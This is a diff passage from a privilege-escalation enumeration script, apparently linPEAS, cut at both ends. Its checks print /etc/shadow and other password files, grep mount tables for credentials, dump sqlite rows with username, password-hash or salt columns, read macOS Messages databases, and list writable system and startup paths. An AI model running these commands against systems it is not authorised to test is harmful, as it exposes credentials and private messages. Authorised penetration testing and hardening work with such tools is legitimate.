[ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Credentials in fstab +print_list "Credentials in fstab/mtab? ........... " +if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +##-- IF) Read shadow files +print_list "Can I read shadow files? ............. " +if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," +else echo_no +fi + +print_list "Can I read shadow plists? ............ " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +print_list "Can I write shadow plists? ........... " +possible_check="" +(for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no + +##-- IF) Read opasswd file +print_list "Can I read opasswd file? ............. " +if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" +else echo_no +fi + +##-- IF) network-scripts +print_list "Can I write in network-scripts? ...... " +if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," +elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," +else echo_no +fi + +##-- IF) Read root dir +print_list "Can I read root folder? .............. " +(ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no +echo "" + +##-- IF) Root files in home dirs +print_2title "Searching root files in home dirs (limit 30)" +(find $HOMESEARCH -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found +echo "" + +##-- IF) Others files in my dirs +if ! [ "$IAMROOT" ]; then + print_2title "Searching folders owned by me containing others files on it (limit 100)" + (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" echo "" +fi - ##-- IF) Files (scripts) in /etc/profile.d/ - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi +##-- IF) Readable files belonging to root and not world readable +if ! [ "$IAMROOT" ]; then + print_2title "Readable files belonging to root and readable by me but not world readable" + (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found echo "" +fi - ##-- IF) Files (scripts) in /etc/init.d/ - print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +##-- IF) Modified interesting files into specific folders in the last 5mins +print_2title "Modified interesting files in the last 5mins (limit 100)" +find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," +echo "" + +##-- IF) Writable log files +print_2title "Writable log files (logrotten) (limit 100)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" +logrotate --version 2>/dev/null || echo_not_found "logrotate" +lastWlogFolder="ImPOsSiBleeElastWlogFolder" +logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) +printf "%s\n" "$logfind" | while read log; do + if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found + if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; + elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case + elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; + elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + fi fi +done + +echo "" + +##-- IF) Files inside my home +print_2title "Files inside $HOME (limit 20)" +(ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found +echo "" + +##-- IF) Files inside /home +print_2title "Files inside others home (limit 20)" +(find $HOMESEARCH -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found +echo "" + +##-- IF) Mail applications +print_2title "Searching installed mail applications" +ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" +echo "" + +##-- IF) Mails +print_2title "Mails (limit 50)" +(find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found +echo "" + +##-- IF) Backup folders +print_2title "Backup folders" +printf "%s\n" "$backup_folders" | while read b ; do + ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; + ls -l "$b" 2>/dev/null && echo "" +done +echo "" + +##-- IF) Backup files +print_2title "Backup files (limited 100)" +backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) +printf "%s\n" "$backs" | head -n 100 | while read b ; do + if [ -r "$b" ]; then + ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; + fi; +done +echo "" + +##-- IF) DB files +if [ "$MACPEAS" ]; then + print_2title "Reading messages database" + sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null + sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null + +fi +print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" +FILECMD="$(command -v file 2>/dev/null)" +if [ "$PSTORAGE_DATABASE" ]; then + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if [ "$FILECMD" ]; then + echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + else + echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + fi + done + SQLITEPYTHON="" echo "" - - ##-- IF) Hashes in passwd file - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" - - ##-- IF) Root files in home dirs - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" - - ##-- IF) Others files in my dirs - if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" - fi - - ##-- IF) Readable files belonging to root and not world readable - if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" - fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - print_2title "Modified interesting files in the last 5mins (limit 100)" - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," - echo "" - - ##-- IF) Writable log files - print_2title "Writable log files (logrotten) (limit 100)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do + if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd + if [ "$(command -v sqlite3 2>/dev/null)" ]; then + tables=$(sqlite3 $f ".tables" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then + SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) + tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) + #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" + else + tables="" + fi + if [ "$tables" ] || [ "$DEBUG" ]; then + printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC + printf "%s\n" "$tables" | while read t; do + columns="" + # Search for credentials inside the table using sqlite3 + if [ -z "$SQLITEPYTHON" ]; then + columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") + # Search for credentials inside the table using python + else + columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) + fi + #Check found columns for interesting fields + INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") + if [ "$INTCOLUMN" ]; then + printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" + printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" + (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head + fi + echo "" + done fi fi done +fi +echo "" - echo "" +if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" +fi - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" +##-- IF) Web files +print_2title "Web files?(output limit)" +ls -alhR /var/www/ 2>/dev/null | head +ls -alhR /srv/www/htdocs/ 2>/dev/null | head +ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head +ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head +echo "" - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" +##-- IF) All hidden files +print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" +find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! -path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 +echo "" - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" - echo "" +##-- IF) Readable files in /tmp, /var/tmp, bachups +print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" +filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) +printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done +echo "" - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" +##-- IF) Interesting writable files by ownership or all +if ! [ "$IAMROOT" ]; then + print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" + print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" + #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all + obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) + printf "%s\n" "$obmowbe" | while read entry; do + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then + echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," + else + echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," + fi done echo "" +fi - ##-- IF) Backup files - print_2title "Backup files (limited 100)" - backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; - done - echo "" - - ##-- IF) DB files - if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - - fi - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - if [ "$PSTORAGE_DATABASE" ]; then - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ]; then - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL 